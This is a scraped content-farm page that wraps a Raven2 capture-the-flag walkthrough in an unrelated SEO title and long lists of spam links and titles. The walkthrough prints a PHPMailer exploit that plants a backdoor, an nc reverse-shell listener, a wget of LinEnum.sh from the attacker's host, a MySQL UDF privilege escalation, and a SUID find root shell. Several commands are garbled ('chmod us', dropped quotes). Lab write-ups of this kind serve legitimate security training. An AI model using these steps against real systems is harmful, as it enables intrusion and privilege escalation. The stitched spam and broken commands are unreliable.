当前位置：首页 > news >正文

cpa单页网站怎么做专门做家具的网站

news 2025/10/28 0:21:09

cpa单页网站怎么做,专门做家具的网站,模具钢东莞网站建设,app外包接活文章目录 Raven2 渗透测试信息收集提权UDF脚本MySQL提权SUID提权 Raven2 渗透测试信息收集查看存活主机 arp-scan -l 找到目标主机。扫描目标主机上的端口、状态、服务类型、版本信息 nmap -A 192.168.160.47目标开放了 22、80、111 端口访问一下80端口#xff0c;并… 文章目录 Raven2 渗透测试信息收集提权UDF脚本MySQL提权SUID提权 Raven2 渗透测试信息收集查看存活主机 arp-scan -l 找到目标主机。扫描目标主机上的端口、状态、服务类型、版本信息 nmap -A 192.168.160.47目标开放了 22、80、111 端口访问一下80端口并查看它的组件没有发现什么有用的信息对目标目录进行扫描 sudo dirsearch -u 192.168.160.47 -i 200也可以使用dirb http://192.168.160.47 进行目录扫描在/vendor/PATH 中找到了flag1 拿到了flag1 在/vendor/VERSION 中有一个版本号这可能是一个软件版本号再看 /vendor 目录下还有几个文件名含有 phpmailer 的文件如PHPMailerAutoload.php 可确定 5.2.6 是 PHPMailer 的版本号。于是使用漏洞利用搜索工具 searchsploit 在 exploit-db 中搜索 PHPMailer 相关的 exp。选用40974.py.使用cp命令将py文件复制到桌面并且使用vim编辑器打开 cp /usr/share/exploitdb/exploits/php/webapps/40974.py /home/kali/Desktop vim 40974.py运行python代码 python 40974.py浏览器访问http://192.168.160.47/contact.php生成后门文件用nc开启监听并访问http://192.168.160.47/sky.php 获得一个低级的shell nc -lvnp 4444使用python获取pty得到交互式的shell python -c import pty;pty.spawn(/bin/bash)在根目录下全局搜索flag find / -name *flag*看到了flag2和flag3.png 查看flag2: 查看flag3 查看wordpress的配置文件 /var/www/html/wordpress/wp-config.php 得到数据库账号root 数据库密码Rv3nSecurity 提权在kali终端下载枚举漏洞工具LinEnum sudo proxychains git clone https://github.com/rebootuser/LinEnum.git 里面有一个LinEnum.sh可执行文件用python搭建一个简单的服务器来把文件下载到靶机里面 python -m http.server 7788在靶机上使用wget下载 wget http://192.168.160.12:7788/LinEnum.sh查看到没有执行权限需要提权chmod修改权限后再./LinEnum.sh执行 chmod x LinEnum.sh执行查到了数据库的版本信息数据库版本为5.5.60 UDF脚本利用脚本 https://www.exploit-db.com/exploits/1518 searchsploit -m 1518 cp /usr/share/exploitdb/exploits/linux/local/1518.c ./1518.c gcc -g -c 1518.c gcc -g -shared -o 1518.so 1518.o -lc将1518.so 文件上传到/tmp 目录下 MySQL提权 use mysql; create table foo(line blob); insert into foo values(load_file(/tmp/1518.so)); select * from foo into dumpfile create function do_system returns integer soname select * from mysql.func; select do_system(chmod us /usr/bin/find);www-dataRaven:/tmp$ mysql -uroot -pRv3nSecurity mysql -uroot -pRv3nSecurity Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 37 Server version: 5.5.60-0deb8u1 (Debian)Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved.Oracle is a registered trademark of Oracle Corporation and/or its affiliates. Other names may be trademarks of their respective owners.Type help; or \h for help. Type \c to clear the current input statement.mysql use mysql; use mysql; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -ADatabase changed mysql create table foo(line blob); create table foo(line blob); Query OK, 0 rows affected (0.01 sec)mysql insert into foo values(load_file(/tmp/1518.so)); insert into foo values(load_file(/tmp/raptor_udf.so)); Query OK, 1 row affected (0.00 sec)mysql select * from foo into dumpfile /usr/lib/mysql/plugin/raptor_udf.so; select * from foo into dumpfile /usr/lib/mysql/plugin/raptor_udf.so; Query OK, 1 row affected (0.01 sec)mysql create function do_system returns integer soname raptor_udf.so; create function do_system returns integer soname raptor_udf.so; Query OK, 0 rows affected (0.00 sec)mysql select * from mysql.func; select * from mysql.func; ----------------------------------------- | name | ret | dl | type | ----------------------------------------- | do_system | 2 | raptor_udf.so | function | ----------------------------------------- 1 row in set (0.00 sec)mysql select do_system(chmod us /usr/bin/find); select do_system(chmod us /usr/bin/find); -------------------------------------- | do_system(chmod us /usr/bin/find) | -------------------------------------- | 0 | -------------------------------------- 1 row in set (0.01 sec)此时/usr/bin/find 就具备了SUID 权限 SUID提权 find 15* -exec /bin/sh \;
文章转载自：
http://www.morning.bpmdx.cn.gov.cn.bpmdx.cn
http://www.morning.jfnbh.cn.gov.cn.jfnbh.cn
http://www.morning.ybyln.cn.gov.cn.ybyln.cn
http://www.morning.hnmbq.cn.gov.cn.hnmbq.cn
http://www.morning.rxydr.cn.gov.cn.rxydr.cn
http://www.morning.xwzsq.cn.gov.cn.xwzsq.cn
http://www.morning.zqkms.cn.gov.cn.zqkms.cn
http://www.morning.qnksk.cn.gov.cn.qnksk.cn
http://www.morning.gmmyn.cn.gov.cn.gmmyn.cn
http://www.morning.qmqgx.cn.gov.cn.qmqgx.cn
http://www.morning.dnls.cn.gov.cn.dnls.cn
http://www.morning.fmkjx.cn.gov.cn.fmkjx.cn
http://www.morning.bkxnp.cn.gov.cn.bkxnp.cn
http://www.morning.ljdtn.cn.gov.cn.ljdtn.cn
http://www.morning.lnrhk.cn.gov.cn.lnrhk.cn
http://www.morning.mjpgl.cn.gov.cn.mjpgl.cn
http://www.morning.fcpjq.cn.gov.cn.fcpjq.cn
http://www.morning.nqgds.cn.gov.cn.nqgds.cn
http://www.morning.kdpal.cn.gov.cn.kdpal.cn
http://www.morning.txfxy.cn.gov.cn.txfxy.cn
http://www.morning.zdbfl.cn.gov.cn.zdbfl.cn
http://www.morning.yppln.cn.gov.cn.yppln.cn
http://www.morning.bqhlp.cn.gov.cn.bqhlp.cn
http://www.morning.qdrhf.cn.gov.cn.qdrhf.cn
http://www.morning.qyfrd.cn.gov.cn.qyfrd.cn
http://www.morning.hkgcx.cn.gov.cn.hkgcx.cn
http://www.morning.dzgyr.cn.gov.cn.dzgyr.cn
http://www.morning.ngzkt.cn.gov.cn.ngzkt.cn
http://www.morning.qrzwj.cn.gov.cn.qrzwj.cn
http://www.morning.rflcy.cn.gov.cn.rflcy.cn
http://www.morning.xnrgb.cn.gov.cn.xnrgb.cn
http://www.morning.gypcr.cn.gov.cn.gypcr.cn
http://www.morning.jstggt.cn.gov.cn.jstggt.cn
http://www.morning.zymgs.cn.gov.cn.zymgs.cn
http://www.morning.kwnbd.cn.gov.cn.kwnbd.cn
http://www.morning.grqlc.cn.gov.cn.grqlc.cn
http://www.morning.jbpdk.cn.gov.cn.jbpdk.cn
http://www.morning.ssqrd.cn.gov.cn.ssqrd.cn
http://www.morning.bdzps.cn.gov.cn.bdzps.cn
http://www.morning.zpdjh.cn.gov.cn.zpdjh.cn
http://www.morning.fpxsd.cn.gov.cn.fpxsd.cn
http://www.morning.bkqdg.cn.gov.cn.bkqdg.cn
http://www.morning.zzfqn.cn.gov.cn.zzfqn.cn
http://www.morning.zxybw.cn.gov.cn.zxybw.cn
http://www.morning.zmwd.cn.gov.cn.zmwd.cn
http://www.morning.nlqgb.cn.gov.cn.nlqgb.cn
http://www.morning.kjfqf.cn.gov.cn.kjfqf.cn
http://www.morning.bsxws.cn.gov.cn.bsxws.cn
http://www.morning.rgyts.cn.gov.cn.rgyts.cn
http://www.morning.qzmnr.cn.gov.cn.qzmnr.cn
http://www.morning.rkmsm.cn.gov.cn.rkmsm.cn
http://www.morning.mxftp.com.gov.cn.mxftp.com
http://www.morning.pmdlk.cn.gov.cn.pmdlk.cn
http://www.morning.zbnkt.cn.gov.cn.zbnkt.cn
http://www.morning.nmpdm.cn.gov.cn.nmpdm.cn
http://www.morning.qwrb.cn.gov.cn.qwrb.cn
http://www.morning.hxycm.cn.gov.cn.hxycm.cn
http://www.morning.gcthj.cn.gov.cn.gcthj.cn
http://www.morning.yqrfn.cn.gov.cn.yqrfn.cn
http://www.morning.zqxhn.cn.gov.cn.zqxhn.cn
http://www.morning.snyqb.cn.gov.cn.snyqb.cn
http://www.morning.rzdzb.cn.gov.cn.rzdzb.cn
http://www.morning.dkslm.cn.gov.cn.dkslm.cn
http://www.morning.lqjlg.cn.gov.cn.lqjlg.cn
http://www.morning.coffeedelsol.com.gov.cn.coffeedelsol.com
http://www.morning.zkzjm.cn.gov.cn.zkzjm.cn
http://www.morning.kdxzy.cn.gov.cn.kdxzy.cn
http://www.morning.tgnwt.cn.gov.cn.tgnwt.cn
http://www.morning.yrgb.cn.gov.cn.yrgb.cn
http://www.morning.rydbs.cn.gov.cn.rydbs.cn
http://www.morning.smwlr.cn.gov.cn.smwlr.cn
http://www.morning.c7493.cn.gov.cn.c7493.cn
http://www.morning.xkjrq.cn.gov.cn.xkjrq.cn
http://www.morning.nkbfc.cn.gov.cn.nkbfc.cn
http://www.morning.lpgw.cn.gov.cn.lpgw.cn
http://www.morning.rjjjk.cn.gov.cn.rjjjk.cn
http://www.morning.prprz.cn.gov.cn.prprz.cn
http://www.morning.tqpnf.cn.gov.cn.tqpnf.cn
http://www.morning.yrnrr.cn.gov.cn.yrnrr.cn
http://www.morning.nwfpl.cn.gov.cn.nwfpl.cn

http://www.tj-hxxt.cn/news/255224.html

相关文章：

商城网站做推广oj网站开发

中山网站百度优化导视设计案例

能上传文件的网站网站后台如何修改标题

南京企业网站做优化建设一个网站需要的空间有哪些方法

wix做网站的建议wordpress博客占用cpu

医院网站页面设计做企业网站和邮箱

网站怎么设计外网访问群晖wordpress

在菲做平台网站定安免费建站公司

网站托管域名网站功能怎么写

宝山做网站价格自己开网站工作室

免费手机网站制作佛山企业网站建设流程

做uml图网站建筑设计方案

做网站用小图标在什么网下载上海景观设计公司

网站二级目录是什么中国摄影网官网首页

自助业务网站系统全国住房城乡建设厅网站

烟台网站建设企业怎么建立一个表格

个人网站名称国外logo设计网站推荐

曲阜企业网站建设百度人气榜

四会市住房和城乡建设局网站网络热词2022流行语及解释

沧州泊头纯设计网站制作返利淘客网站源码

广东手机微信网站制作新浪云wordpress

试玩app推广网站建设05网课时作业本

制作一个网站需要多长时间在线制作离婚证图片

网页浏览器英文缩写seo查询什么意思

个人网站建设方案书例文php医疗网站咨询源码

嘉兴网站建设技术托管学生自做网站优秀作品

设置网站关键词怎么做广州宣传片制作

松门建设规划局网站做关键词排名卖网站

网站移动窗口代码在手机上怎么制作网站吗

做招投标有哪些网站crm软件免费